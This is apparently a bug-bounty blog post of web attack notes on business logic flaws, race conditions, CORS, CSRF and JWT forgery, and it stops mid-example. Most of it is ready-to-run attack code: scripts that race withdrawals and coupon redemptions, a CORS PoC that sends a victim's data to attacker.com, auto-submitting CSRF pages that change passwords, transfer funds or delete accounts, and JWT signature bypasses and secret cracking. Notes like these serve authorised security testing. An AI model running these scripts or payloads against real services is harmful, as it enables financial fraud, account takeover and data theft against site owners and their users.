Skip to main content

Web Hacking Notes | Bug Bounties (Business Logic Exploits & Advanced Attacks)

5833 words
Edwin Tok | Shiro
Author
Edwin Tok | Shiro
「 ✦ OwO ✦ 」
Table of Contents

Web VAPT & Bug Bounty Notes
#


Business Logic Exploits
#

Exploit flaws in application logic and workflow design to manipulate business processes, bypass intended restrictions, or abuse functionality for unintended outcomes.

E-commerce platforms, fintech applications, subscription services, and crypto/Web3 applications present rich business logic vulnerabilities. Focus on race conditions, workflow bypasses, and economic attacks.

Parameter Manipulation
#

# Price manipulation
# Original request:
POST /api/checkout HTTP/1.1
Content-Type: application/json

{"item_id":"123","quantity":1,"price":100.00}

# Attacks:
{"item_id":"123","quantity":1,"price":-100.00}    # Negative price
{"item_id":"123","quantity":1,"price":0.01}       # Near-zero price
{"item_id":"123","quantity":1,"price":"100"}      # String vs number confusion

# Quantity manipulation
{"item_id":"123","quantity":-1,"price":100.00}    # Negative quantity (refund?)
{"item_id":"123","quantity":999999,"price":100.00} # Integer overflow
{"item_id":"123","quantity":0,"price":100.00}     # Zero quantity (free item?)
{"item_id":"123","quantity":0.5,"price":100.00}   # Float quantity

# Discount abuse
# Apply multiple discount codes
POST /api/apply-discount HTTP/1.1
Content-Type: application/json

{"order_id":"456","discount_code":"SAVE10"}
{"order_id":"456","discount_code":"SAVE20"}
{"order_id":"456","discount_code":"SAVE30"}
# Check if all discounts stack

# Use expired/invalid codes
{"order_id":"456","discount_code":"EXPIRED2019"}
{"order_id":"456","discount_code":"INVALID"}

# Discount code enumeration
for code in $(cat discount_codes.txt); do
    curl -s -X POST "http://target.com/api/apply-discount" \
        -H "Content-Type: application/json" \
        -d "{\"order_id\":\"456\",\"discount_code\":\"$code\"}"
done

# Boolean manipulation (privilege fields)
POST /api/user/register HTTP/1.1
Content-Type: application/json

{"username":"test","email":"test@test.com","is_premium":false}
# Try: {"username":"test","email":"test@test.com","is_premium":true}

{"is_admin":false}{"is_admin":true}
{"user_type":"normal"}{"user_type":"premium"}
{"role":"user"}{"role":"admin"}
{"verified":false}{"verified":true}

# Currency manipulation
{"amount":100,"currency":"USD"}
# Try: {"amount":100,"currency":"JPY"}  # 100 JPY = ~$0.67
# Try: {"amount":100,"currency":""}     # No currency
# Try: {"amount":100,"currency":"ABC"}  # Invalid currency

# Subscription tier manipulation
POST /api/subscribe HTTP/1.1
Content-Type: application/json

{"plan":"basic","price":9.99}
# Try: {"plan":"enterprise","price":9.99}

# Credit/points manipulation
{"credits_to_use":10}{"credits_to_use":-10}    # Gain credits?
{"points":100}{"points":999999}          # Overflow
{"wallet_balance":50.00}{"wallet_balance":5000.00}

# OPSEC: Automated parameter fuzzing
cat > parameter_fuzzer.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys

def fuzz_parameters(url, base_payload, token):
    print("[*] Fuzzing business logic parameters")
    
    # Price manipulation tests
    price_tests = [
        -100, -1, -0.01, 0, 0.01, 1, 999999, -999999,
        "0", "-1", "abc", "null", "", None
    ]
    
    for price in price_tests:
        payload = base_payload.copy()
        payload['price'] = price
        
        headers = {
            'Authorization': f'Bearer {token}',
            'Content-Type': 'application/json'
        }
        
        try:
            r = requests.post(url, json=payload, headers=headers, timeout=5)
            
            if r.status_code in [200, 201]:
                print(f"[+] SUCCESS with price={price}")
                print(f"    Response: {r.text[:200]}")
                
                # Check if order was created with manipulated price
                if 'order_id' in r.text or 'success' in r.text.lower():
                    print(f"[!] CRITICAL: Order created with price={price}")
                    
        except Exception as e:
            print(f"[-] Error with price={price}: {e}")
    
    # Quantity manipulation
    quantity_tests = [-1, -10, 0, 999999, -999999, 0.5]
    
    for qty in quantity_tests:
        payload = base_payload.copy()
        payload['quantity'] = qty
        
        try:
            r = requests.post(url, json=payload, headers=headers, timeout=5)
            if r.status_code in [200, 201]:
                print(f"[+] SUCCESS with quantity={qty}")
        except:
            pass
    
    # Boolean privilege escalation
    privilege_fields = [
        'is_admin', 'is_premium', 'is_verified', 
        'admin', 'premium', 'verified', 
        'role', 'user_type', 'access_level'
    ]
    
    for field in privilege_fields:
        payload = base_payload.copy()
        payload[field] = True
        
        try:
            r = requests.post(url, json=payload, headers=headers, timeout=5)
            if r.status_code in [200, 201]:
                print(f"[+] SUCCESS with {field}=True")
                if field in r.text.lower():
                    print(f"[!] CRITICAL: Privilege escalation via {field}")
        except:
            pass

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <url> <payload_json> <token>")
        print(f"Example: {sys.argv[0]} http://api.com/order '{{\"item\":\"123\"}}' token")
        sys.exit(1)
    
    url = sys.argv[1]
    payload = json.loads(sys.argv[2])
    token = sys.argv[3]
    
    fuzz_parameters(url, payload, token)
EOF

chmod +x parameter_fuzzer.py

Race Conditions
#

# Race condition exploitation (parallel requests)

# Scenario 1: Concurrent purchase of limited items
# If only 1 item in stock, send 10 simultaneous purchase requests

cat > race_condition_purchase.sh << 'EOF'
#!/bin/bash
# Usage: ./race_condition_purchase.sh http://target.com/api/purchase token item_id

url="$1"
token="$2"
item_id="$3"
threads=20

echo "[*] Starting race condition attack with $threads threads"

# Function to make purchase request
purchase() {
    curl -s -X POST "$url" \
        -H "Authorization: Bearer $token" \
        -H "Content-Type: application/json" \
        -d "{\"item_id\":\"$item_id\",\"quantity\":1}" &
}

# Fire all requests simultaneously
for i in $(seq 1 $threads); do
    purchase
done

wait
echo "[*] All requests completed. Check your orders."
EOF

chmod +x race_condition_purchase.sh

# Scenario 2: Account balance race condition
# Withdraw $100 from account with only $100 balance multiple times

cat > race_condition_balance.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys

def withdraw(url, token, amount, results):
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    
    payload = {'amount': amount}
    
    try:
        r = requests.post(url, json=payload, headers=headers, timeout=5)
        results.append(r.status_code)
        
        if r.status_code in [200, 201]:
            print(f"[+] Withdrawal successful: {r.text[:100]}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <url> <token> <amount>")
        sys.exit(1)
    
    url = sys.argv[1]
    token = sys.argv[2]
    amount = float(sys.argv[3])
    
    threads = []
    results = []
    
    print(f"[*] Starting race condition attack: withdrawing ${amount} x 10")
    
    # Create 10 simultaneous withdrawal requests
    for i in range(10):
        t = threading.Thread(target=withdraw, args=(url, token, amount, results))
        threads.append(t)
    
    # Start all threads at once
    for t in threads:
        t.start()
    
    # Wait for completion
    for t in threads:
        t.join()
    
    successes = sum(1 for r in results if r in [200, 201])
    print(f"\n[*] Results: {successes} successful withdrawals")
    
    if successes > 1:
        print(f"[!] RACE CONDITION VULNERABILITY: Multiple withdrawals succeeded!")
EOF

chmod +x race_condition_balance.py
python3 race_condition_balance.py http://api.com/withdraw token 100

# Scenario 3: Coupon/gift card race condition
# Use same gift card code multiple times simultaneously

cat > race_condition_coupon.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import sys
import time

class CouponRace:
    def __init__(self, url, coupon_code, num_threads=20):
        self.url = url
        self.coupon_code = coupon_code
        self.num_threads = num_threads
        self.success_count = 0
        self.lock = threading.Lock()
    
    def redeem(self, session_token):
        headers = {
            'Authorization': f'Bearer {session_token}',
            'Content-Type': 'application/json'
        }
        
        payload = {'coupon_code': self.coupon_code}
        
        try:
            r = requests.post(self.url, json=payload, headers=headers, timeout=5)
            
            if r.status_code in [200, 201]:
                with self.lock:
                    self.success_count += 1
                    print(f"[+] Redemption #{self.success_count} successful")
                    
        except Exception as e:
            pass
    
    def attack(self, tokens):
        threads = []
        
        print(f"[*] Starting race condition with {self.num_threads} threads")
        
        for i, token in enumerate(tokens[:self.num_threads]):
            t = threading.Thread(target=self.redeem, args=(token,))
            threads.append(t)
        
        # Start all threads simultaneously
        for t in threads:
            t.start()
        
        for t in threads:
            t.join()
        
        print(f"\n[*] Attack complete. {self.success_count} successful redemptions")
        
        if self.success_count > 1:
            print("[!] VULNERABILITY: Coupon redeemed multiple times!")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <url> <coupon_code> <tokens_file>")
        sys.exit(1)
    
    url = sys.argv[1]
    coupon = sys.argv[2]
    
    # Load multiple session tokens (create multiple accounts)
    tokens = []
    if len(sys.argv) > 3:
        with open(sys.argv[3]) as f:
            tokens = [line.strip() for line in f]
    else:
        # Use same token multiple times
        tokens = ['YOUR_TOKEN'] * 20
    
    race = CouponRace(url, coupon, num_threads=len(tokens))
    race.attack(tokens)
EOF

chmod +x race_condition_coupon.py

# Scenario 4: Voting/rating race condition
# Vote multiple times on same item

for i in {1..100}; do
    curl -s -X POST "http://target.com/api/vote" \
        -H "Authorization: Bearer $token" \
        -d '{"item_id":"123","vote":"upvote"}' &
done
wait

# OPSEC: Advanced race condition with precise timing
cat > precise_race_condition.py << 'EOF'
#!/usr/bin/env python3
import requests
import threading
import time

class PreciseRaceCondition:
    def __init__(self, url, token, threads=10):
        self.url = url
        self.token = token
        self.threads = threads
        self.barrier = threading.Barrier(threads)
        self.results = []
    
    def make_request(self, payload):
        # Wait at barrier for all threads to be ready
        self.barrier.wait()
        
        headers = {
            'Authorization': f'Bearer {self.token}',
            'Content-Type': 'application/json'
        }
        
        try:
            start = time.time()
            r = requests.post(self.url, json=payload, headers=headers)
            end = time.time()
            
            result = {
                'status': r.status_code,
                'time': end - start,
                'response': r.text[:200]
            }
            self.results.append(result)
            
        except Exception as e:
            self.results.append({'error': str(e)})
    
    def execute(self, payload):
        threads = []
        
        print(f"[*] Preparing {self.threads} threads for simultaneous execution")
        
        for i in range(self.threads):
            t = threading.Thread(target=self.make_request, args=(payload,))
            threads.append(t)
            t.start()
        
        for t in threads:
            t.join()
        
        # Analyze results
        successes = sum(1 for r in self.results if r.get('status') in [200, 201])
        
        print(f"\n[*] Results:")
        print(f"    Successful requests: {successes}/{self.threads}")
        print(f"    Average response time: {sum(r.get('time', 0) for r in self.results) / len(self.results):.3f}s")
        
        if successes > 1:
            print(f"[!] RACE CONDITION: {successes} concurrent operations succeeded")
        
        return self.results

# Example usage
if __name__ == "__main__":
    race = PreciseRaceCondition(
        url="http://target.com/api/purchase",
        token="YOUR_TOKEN",
        threads=20
    )
    
    payload = {
        "item_id": "limited_item_123",
        "quantity": 1
    }
    
    race.execute(payload)
EOF

chmod +x precise_race_condition.py

Workflow Bypasses
#

# E-commerce flow bypass

# Normal flow:
# 1. Add to Cart
# 2. Enter Shipping Info
# 3. Enter Payment Info
# 4. Review Order
# 5. Confirm Purchase

# Attack: Skip payment step
# After step 2 (shipping), directly go to step 5 (confirm)

POST /api/order/confirm HTTP/1.1
Content-Type: application/json

{
  "order_id":"12345",
  "shipping_address":"123 Main St",
  "payment_status":"completed"  # Manually set as completed
}

# Multi-step registration bypass
# Normal: Step 1 → Step 2 → Step 3 → Complete
# Attack: Direct to Complete with minimal data

POST /api/register/complete HTTP/1.1
Content-Type: application/json

{
  "step":3,
  "email":"test@test.com",
  "verified":true  # Skip email verification
}

# Password reset bypass
# Normal: Request Reset → Email Link → New Password
# Attack: Direct to reset with guessed/enumerated token

GET /reset-password?token=000000 HTTP/1.1
# Try sequential tokens: 000001, 000002, etc.

# Or predict token pattern:
# If token = md5(email + timestamp)
# Calculate: md5("victim@target.com" + "recent_timestamp")

# Account verification bypass
# Skip email verification by manipulating state

POST /api/account/update HTTP/1.1
Content-Type: application/json

{
  "email":"test@test.com",
  "email_verified":true  # Manually verify
}

# Payment verification bypass
# Mark order as paid without actual payment

POST /api/order/123/status HTTP/1.1
Content-Type: application/json

{
  "payment_status":"paid",
  "payment_method":"credit_card"
}

# Subscription cancellation bypass
# If cancellation requires multiple steps, skip to final

POST /api/subscription/cancel/confirm HTTP/1.1
Content-Type: application/json

{
  "subscription_id":"sub_123",
  "confirmed":true,
  "skip_survey":true
}

# OPSEC: Workflow enumeration
cat > workflow_enum.py << 'EOF'
#!/usr/bin/env python3
import requests
import json

def enumerate_workflow_steps(base_url, token, max_steps=10):
    """Enumerate all possible workflow steps"""
    
    print("[*] Enumerating workflow steps")
    
    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }
    
    endpoints = []
    
    # Try different step patterns
    patterns = [
        f"/api/workflow/step/{{step}}",
        f"/api/process/{{step}}",
        f"/api/register/step{{step}}",
        f"/api/checkout/step-{{step}}",
        f"/api/order/{{step}}"
    ]
    
    for pattern in patterns:
        for step in range(1, max_steps + 1):
            url = base_url + pattern.format(step=step)
            
            try:
                r = requests.get(url, headers=headers, timeout=5)
                
                if r.status_code == 200:
                    print(f"[+] Found step: {url}")
                    endpoints.append({
                        'url': url,
                        'step': step,
                        'response': r.text[:200]
                    })
                    
            except:
                pass
    
    # Try to skip to final step
    if endpoints:
        final_step = max(e['step'] for e in endpoints)
        final_url = base_url + patterns[0].format(step=final_step)
        
        print(f"\n[*] Testing direct access to final step: {final_url}")
        
        payload = {
            'step': final_step,
            'completed': True,
            'skip_validation': True
        }
        
        try:
            r = requests.post(final_url, json=payload, headers=headers)
            
            if r.status_code in [200, 201]:
                print(f"[!] BYPASS: Direct access to final step succeeded!")
                print(f"    Response: {r.text[:200]}")
                
        except Exception as e:
            print(f"[-] Error: {e}")
    
    return endpoints

if __name__ == "__main__":
    enumerate_workflow_steps(
        "http://target.com",
        "YOUR_TOKEN"
    )
EOF

chmod +x workflow_enum.py

Logic Flaw Testing
#

# Automated business logic testing script

cat > business_logic_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
import json
import sys
import time

class BusinessLogicTester:
    def __init__(self, base_url, token):
        self.base_url = base_url
        self.token = token
        self.headers = {
            'Authorization': f'Bearer {token}',
            'Content-Type': 'application/json'
        }
        self.vulnerabilities = []
    
    def test_negative_values(self, endpoint, field):
        """Test negative value handling"""
        print(f"\n[*] Testing negative values on {endpoint}")
        
        negative_values = [-1, -10, -100, -999999]
        
        for value in negative_values:
            payload = {field: value}
            
            try:
                r = requests.post(
                    f"{self.base_url}{endpoint}",
                    json=payload,
                    headers=self.headers,
                    timeout=5
                )
                
                if r.status_code in [200, 201]:
                    print(f"[!] VULNERABILITY: Negative value accepted: {value}")
                    self.vulnerabilities.append({
                        'type': 'negative_value',
                        'endpoint': endpoint,
                        'field': field,
                        'value': value
                    })
                    
            except Exception as e:
                pass
    
    def test_overflow(self, endpoint, field):
        """Test integer overflow"""
        print(f"\n[*] Testing overflow on {endpoint}")
        
        overflow_values = [
            999999999,
            2147483647,  # Max 32-bit int
            2147483648,  # Max + 1
            9999999999999
        ]
        
        for value in overflow_values:
            payload = {field: value}
            
            try:
                r = requests.post(
                    f"{self.base_url}{endpoint}",
                    json=payload,
                    headers=self.headers,
                    timeout=5
                )
                
                if r.status_code in [200, 201]:
                    print(f"[!] VULNERABILITY: Overflow value accepted: {value}")
                    self.vulnerabilities.append({
                        'type': 'overflow',
                        'endpoint': endpoint,
                        'field': field,
                        'value': value
                    })
                    
            except Exception as e:
                pass
    
    def test_boundary_values(self, endpoint, field, min_val=0, max_val=100):
        """Test boundary values"""
        print(f"\n[*] Testing boundary values on {endpoint}")
        
        boundary_values = [
            min_val - 1,
            min_val,
            min_val + 1,
            max_val - 1,
            max_val,
            max_val + 1
        ]
        
        for value in boundary_values:
            payload = {field: value}
            
            try:
                r = requests.post(
                    f"{self.base_url}{endpoint}",
                    json=payload,
                    headers=self.headers,
                    timeout=5
                )
                
                print(f"    {field}={value}: Status {r.status_code}")
                
            except Exception as e:
                pass
    
    def test_missing_parameters(self, endpoint, required_params):
        """Test with missing required parameters"""
        print(f"\n[*] Testing missing parameters on {endpoint}")
        
        for param in required_params:
            # Create payload without this parameter
            payload = {p: "test" for p in required_params if p != param}
            
            try:
                r = requests.post(
                    f"{self.base_url}{endpoint}",
                    json=payload,
                    headers=self.headers,
                    timeout=5
                )
                
                if r.status_code in [200, 201]:
                    print(f"[!] VULNERABILITY: Request succeeded without '{param}'")
                    self.vulnerabilities.append({
                        'type': 'missing_parameter',
                        'endpoint': endpoint,
                        'missing_param': param
                    })
                    
            except Exception as e:
                pass
    
    def test_type_confusion(self, endpoint, field):
        """Test type confusion (string vs int vs bool)"""
        print(f"\n[*] Testing type confusion on {endpoint}")
        
        test_values = [
            100,          # int
            "100",        # string
            True,         # boolean
            [100],        # array
            {"value": 100}, # object
            None,         # null
            "null",       # string "null"
            "",           # empty string
        ]
        
        for value in test_values:
            payload = {field: value}
            
            try:
                r = requests.post(
                    f"{self.base_url}{endpoint}",
                    json=payload,
                    headers=self.headers,
                    timeout=5
                )
                
                print(f"    {field}={value} (type: {type(value).__name__}): Status {r.status_code}")
                
            except Exception as e:
                pass
    
    def generate_report(self):
        """Generate vulnerability report"""
        print("\n" + "="*60)
        print("BUSINESS LOGIC VULNERABILITY REPORT")
        print("="*60)
        
        if not self.vulnerabilities:
            print("\n[+] No vulnerabilities detected")
        else:
            print(f"\n[!] Found {len(self.vulnerabilities)} vulnerabilities:\n")
            
            for i, vuln in enumerate(self.vulnerabilities, 1):
                print(f"{i}. {vuln['type'].upper()}")
                print(f"   Endpoint: {vuln['endpoint']}")
                print(f"   Details: {json.dumps({k:v for k,v in vuln.items() if k not in ['type', 'endpoint']}, indent=6)}")
                print()
        
        # Save to file
        with open('business_logic_report.json', 'w') as f:
            json.dump(self.vulnerabilities, f, indent=2)
        
        print("[*] Report saved to: business_logic_report.json")

# Example usage
if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <base_url> <token>")
        sys.exit(1)
    
    tester = BusinessLogicTester(sys.argv[1], sys.argv[2])
    
    # Test various endpoints
    tester.test_negative_values('/api/purchase', 'price')
    tester.test_negative_values('/api/purchase', 'quantity')
    tester.test_overflow('/api/purchase', 'quantity')
    tester.test_boundary_values('/api/purchase', 'quantity', 0, 100)
    tester.test_missing_parameters('/api/purchase', ['item_id', 'quantity', 'price'])
    tester.test_type_confusion('/api/purchase', 'price')
    
    tester.generate_report()
EOF

chmod +x business_logic_tester.py
python3 business_logic_tester.py http://target.com YOUR_TOKEN

Advanced Attacks
#

Cross-Origin Resource Sharing (CORS) Misconfiguration
#

bash

# CORS Misconfiguration Testing

# Test 1: Reflected Origin (most critical)
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: https://evil.com

# Look for response:
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true

# If both present = CRITICAL vulnerability

# Test 2: Null Origin
GET /api/sensitive HTTP/1.1
Host: vulnerable.com
Origin: null

# Check if:
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

# Test 3: Wildcard with credentials (misconfiguration)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# This is invalid by spec but some servers allow it

# Test 4: Subdomain bypass
Origin: https://evil.vulnerable.com
Origin: https://vulnerableevil.com
Origin: https://vulnerable.com.evil.com

# Test 5: Regex bypass (if origin validation uses regex)
Origin: https://vulnerableXcom  # If regex: /vulnerable\.com/
Origin: https://vulnerable.com.evil.com

# OPSEC: Automated CORS testing
cat > cors_scanner.py << 'EOF'
#!/usr/bin/env python3
import requests
import sys

def test_cors(url, sensitive_endpoint='/api/user/profile'):
    """Test CORS misconfigurations"""
    
    print(f"[*] Testing CORS on {url}{sensitive_endpoint}")
    
    test_origins = [
        'https://evil.com',
        'https://attacker.com',
        'null',
        'http://localhost',
        f'https://evil.{url.split("//")[1]}',
        f'https://{url.split("//")[1]}.evil.com'
    ]
    
    vulnerabilities = []
    
    for origin in test_origins:
        headers = {'Origin': origin}
        
        try:
            r = requests.get(url + sensitive_endpoint, headers=headers, timeout=5)
            
            acao = r.headers.get('Access-Control-Allow-Origin', '')
            acac = r.headers.get('Access-Control-Allow-Credentials', '')
            
            print(f"\n[*] Testing Origin: {origin}")
            print(f"    Access-Control-Allow-Origin: {acao}")
            print(f"    Access-Control-Allow-Credentials: {acac}")
            
            # Check for vulnerabilities
            if acao == origin and acac.lower() == 'true':
                print(f"[!] CRITICAL: Reflected origin with credentials!")
                vulnerabilities.append({
                    'origin': origin,
                    'type': 'reflected_origin_with_creds'
                })
                
            elif acao == '*' and acac.lower() == 'true':
                print(f"[!] CRITICAL: Wildcard with credentials!")
                vulnerabilities.append({
                    'origin': origin,
                    'type': 'wildcard_with_creds'
                })
                
            elif acao == 'null' and acac.lower() == 'true':
                print(f"[!] HIGH: Null origin with credentials!")
                vulnerabilities.append({
                    'origin': origin,
                    'type': 'null_origin_with_creds'
                })
                
        except Exception as e:
            print(f"[-] Error testing {origin}: {e}")
    
    if vulnerabilities:
        print(f"\n[!] Found {len(vulnerabilities)} CORS vulnerabilities")
        generate_poc(url, sensitive_endpoint, vulnerabilities[0])
    else:
        print("\n[+] No CORS vulnerabilities detected")
    
    return vulnerabilities

def generate_poc(target_url, endpoint, vuln):
    """Generate CORS exploitation PoC"""
    
    poc_html = f"""<!DOCTYPE html>
<html>
<head>
    <title>CORS PoC - {target_url}</title>
</head>
<body>
    <h1>CORS Exploitation PoC</h1>
    <div id="output"></div>
    
    <script>
    // CORS exploit to steal sensitive data
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {{
        if (xhr.readyState == 4 && xhr.status == 200) {{
            // Display stolen data
            document.getElementById('output').innerHTML = 
                '<h2>Stolen Data:</h2><pre>' + xhr.responseText + '</pre>';
            
            // Exfiltrate to attacker server
            fetch('https://attacker.com/steal', {{
                method: 'POST',
                body: xhr.responseText
            }});
        }}
    }};
    
    xhr.open('GET', '{target_url}{endpoint}', true);
    xhr.withCredentials = true;  // Include cookies
    xhr.send();
    </script>
</body>
</html>"""
    
    with open('cors_poc.html', 'w') as f:
        f.write(poc_html)
    
    print(f"\n[+] PoC saved to: cors_poc.html")
    print(f"[+] Host this file and have victim visit it")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        sys.exit(1)
    
    test_cors(sys.argv[1])
EOF

chmod +x cors_scanner.py
python3 cors_scanner.py https://target.com

Cross-Site Request Forgery (CSRF)
#

# CSRF Detection and Exploitation

# Step 1: Identify state-changing requests
POST /change-password HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=abc123

current_password=old123&new_password=new456

# Step 2: Check for CSRF protections
# - CSRF tokens in forms/headers
# - SameSite cookie attributes
# - Referer/Origin header validation
# - Custom headers requirement

# Step 3: Test for bypasses

# Bypass 1: Remove CSRF token
POST /change-password HTTP/1.1
# ... (without CSRF token)

# Bypass 2: Use invalid CSRF token
csrf_token=invalid

# Bypass 3: Use another user's CSRF token
csrf_token=ANOTHER_USER_TOKEN

# Bypass 4: Change request method (if poorly implemented)
GET /change-password?new_password=hacked

# Bypass 5: Change Content-Type
Content-Type: application/json
Content-Type: text/plain
Content-Type: multipart/form-data

# CSRF PoC generation (Burp Suite method)
# Right-click request → Engagement Tools → Generate CSRF PoC

# Manual CSRF PoC (form-based)
cat > csrf_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>CSRF PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    
    <form action="https://target.com/change-password" method="POST" id="csrf-form">
        <input type="hidden" name="new_password" value="hacked123">
    </form>
    
    <script>
        // Auto-submit form when page loads
        document.getElementById('csrf-form').submit();
    </script>
</body>
</html>
EOF

# CSRF with JSON payload
cat > csrf_json_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<head>
    <title>CSRF JSON PoC</title>
</head>
<body>
    <h1>Loading...</h1>
    
    <script>
    // CSRF with JSON via XMLHttpRequest
    var xhr = new XMLHttpRequest();
    xhr.open('POST', 'https://target.com/api/change-email', true);
    xhr.setRequestHeader('Content-Type', 'application/json');
    xhr.withCredentials = true;  // Include cookies
    xhr.send('{"email":"attacker@evil.com"}');
    </script>
</body>
</html>
EOF

# CSRF with Fetch API (modern)
cat > csrf_fetch_poc.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
    <script>
    fetch('https://target.com/api/transfer', {
        method: 'POST',
        credentials: 'include',  // Include cookies
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({
            to: 'attacker',
            amount: 1000
        })
    });
    </script>
</body>
</html>
EOF

# Bypassing SameSite=Lax (2025 techniques)
# SameSite=Lax allows GET requests from cross-site
# If application accepts GET for state-changing:
cat > csrf_samesite_bypass.html << 'EOF'
<!DOCTYPE html>
<html>
<body>
    <!-- SameSite=Lax bypass via top-level navigation -->
    <script>
    // Method 1: Direct navigation (allows cookies)
    window.location = 'https://target.com/delete-account?confirm=true';
    
    // Method 2: Use form with GET method
    // <form action="https://target.com/delete-account" method="GET">
    //   <input name="confirm" value="true">
    // </form>
    </script>
</body>
</html>
EOF

# Bypassing Referer validation
# If server checks Referer header

# Method 1: Suppress Referer
<meta name="referrer" content="no-referrer">

# Method 2: Match domain in Referer
# Host PoC at: target.com.evil.com
# Or: evil.com/target.com/csrf.html

# OPSEC: Automated CSRF testing
cat > csrf_tester.py << 'EOF'
#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
import sys

def find_csrf_vulnerabilities(base_url, authenticated_session):
    """Test endpoints for CSRF vulnerabilities"""
    
    print(f"[*] Testing {base_url} for CSRF vulnerabilities")
    
    session = requests.Session()
    session.cookies.update(authenticated_session)
    
    # Get forms from main pages
    pages = ['/', '/profile', '/settings', '/account']
    
    vulnerabilities = []
    
    for page in pages:
        try:
            r = session.get(base_url + page)
            soup = BeautifulSoup(r.text, 'html.parser')
            
            forms = soup.find_all('form')
            
            for form in forms:
                action = form.get('action', '')
                method = form.get('method', 'GET').upper()
                
                # Check if form has CSRF token
                csrf_input = form.find('input', {'name': lambda x: x and 'csrf' in x.lower()})
                
                if method == 'POST' and not csrf_input:
                    print(f"[!] Potential CSRF: {method} {action}")
                    print(f"    No CSRF token found")
                    
                    vulnerabilities.append({
                        'url': base_url + action,
                        'method': method,
                        'has_csrf_token': False
                    })
                    
                    # Test if request works without CSRF token
                    form_data = {}
                    for input_field in form.find_all('input'):
                        name = input_field.get('name')
                        if name and 'csrf' not in name.lower():
                            form_data[name] = 'test'
                    
                    test_response = session.request(
                        method,
                        base_url + action,
                        data=form_data
                    )
                    
                    if test_response.status_code in [200, 201, 302]:
                        print(f"[!] CONFIRMED: Request succeeded without CSRF token")
                        
        except Exception as e:
            print(f"[-] Error testing {page}: {e}")
    
    return vulnerabilities

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <base_url> [session_cookie]")
        sys.exit(1)
    
    base_url = sys.argv[1]
    session_cookie = {}
    
    if len(sys.argv) > 2:
        session_cookie = {'session': sys.argv[2]}
    
    find_csrf_vulnerabilities(base_url, session_cookie)
EOF

chmod +x csrf_tester.py

JSON Web Token (JWT) Attacks
#

# JWT Structure: header.payload.signature
# Example: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

# Attack 1: Algorithm Confusion (alg=none)
# Decode JWT at jwt.io
# Change algorithm to "none" in header
# Remove signature (keep trailing dot)

# Header: {"alg":"none","typ":"JWT"}
# Payload: {"sub":"admin","iat":1516239022}
# Result: eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImlhdCI6MTUxNjIzOTAyMn0.

# Attack 2: Algorithm Confusion (RS256 to HS256)
# If server uses RS256 (asymmetric) but accepts HS256 (symmetric)
# Sign token with HS256 using server's RSA public key

cat > jwt_rs256_to_hs256.py << 'EOF'
#!/usr/bin/env python3
import jwt
import sys

def rs256_to_hs256_attack(token, public_key_file):
    """Convert RS256 JWT to HS256 using public key as secret"""
    
    # Decode without verification
    payload = jwt.decode(token, options={"verify_signature": False})
    
    # Modify payload (e.g., escalate privileges)
    payload['role'] = 'admin'
    payload['is_admin'] = True
    
    # Read public key
    with open(public_key_file, 'r') as f:
        public_key = f.read()
    
    # Sign with HS256 using public key as secret
    malicious_token = jwt.encode(payload, public_key, algorithm='HS256')
    
    print(f"[+] Original token: {token}")
    print(f"[+] Malicious token: {malicious_token}")
    
    return malicious_token

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: {sys.argv[0]} <jwt_token> <public_key_file>")
        sys.exit(1)
    
    rs256_to_hs256_attack(sys.argv[1], sys.argv[2])
EOF

chmod +x jwt_rs256_to_hs256.py

# Attack 3: Weak Secret Brute Force
# Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

# Using john the ripper
john jwt.txt --wordlist=rockyou.txt --format=HMAC-SHA256

# Using jwt-cracker (Node.js)
npm install -g jwt-cracker
jwt-cracker "eyJ0eXAiOiJKV1QiLCJhbGc..." "abcdefghijklmnopqrstuvwxyz0123456789" 6

# Attack 4: Kid Parameter Manipulation
# If JWT header has "kid" (Key ID), try path traversal

# Original header:
# {"alg":"HS256","typ":"JWT","kid":"key1"}

# Attack headers:
{"alg":"HS256","typ":"JWT","kid":"../../dev/null"}  # Empty file = empty secret
{"alg":"HS256","typ":"JWT","kid":"/dev/null"}
{"alg":"HS256","typ":"JWT","kid":"../../../proc/self/environ"}

# Sign with empty secret:
import jwt
payload = {"sub":"admin"}
token = jwt.encode(payload, "", algorithm="HS256")

# Attack 5: JKU (JWK Set URL) Header Injection
# Host malicious JWK on your server

# JWT header:
{
  "alg": "RS256",
  "typ": "JWT",
  "jku": "https://attacker.com/jwks.json"
}

# Host jwks.json on attacker.com:
cat > jwks.json << 'EOF'
{
  "keys": [
    {
